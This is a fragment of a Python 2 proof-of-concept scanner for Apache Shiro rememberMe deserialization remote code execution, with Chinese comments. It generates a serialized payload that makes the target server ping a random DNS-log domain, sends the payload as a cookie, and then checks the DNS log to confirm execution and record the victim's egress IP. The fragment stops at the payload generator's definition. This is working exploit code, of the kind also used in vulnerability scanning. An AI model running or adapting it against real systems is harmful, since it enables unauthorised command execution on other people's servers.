(url)
| 23 | |
| 24 | |
| 25 | def poc(url): |
| 26 | if '://' not in url: |
| 27 | target = 'https://%s' % url if ':443' in url else 'http://%s' % url |
| 28 | else: |
| 29 | target = url |
| 30 | try: |
| 31 | cloudeye = CloudEye() |
| 32 | domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组 |
| 33 | rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码 |
| 34 | payload = generator(rce_command, JAR_FILE) # 生成payload |
| 35 | requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求 |
| 36 | |
| 37 | dnslog = cloudeye.getDnsRecord(delay=2) |
| 38 | if domain in dnslog: |
| 39 | msg = url |
| 40 | for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip |
| 41 | msg += ' - ' + each |
| 42 | return msg |
| 43 | |
| 44 | except Exception, e: |
| 45 | pass |
| 46 | return False |
| 47 | |
| 48 | |
| 49 | def generator(command, fp): |
nothing calls this directly
no test coverage detected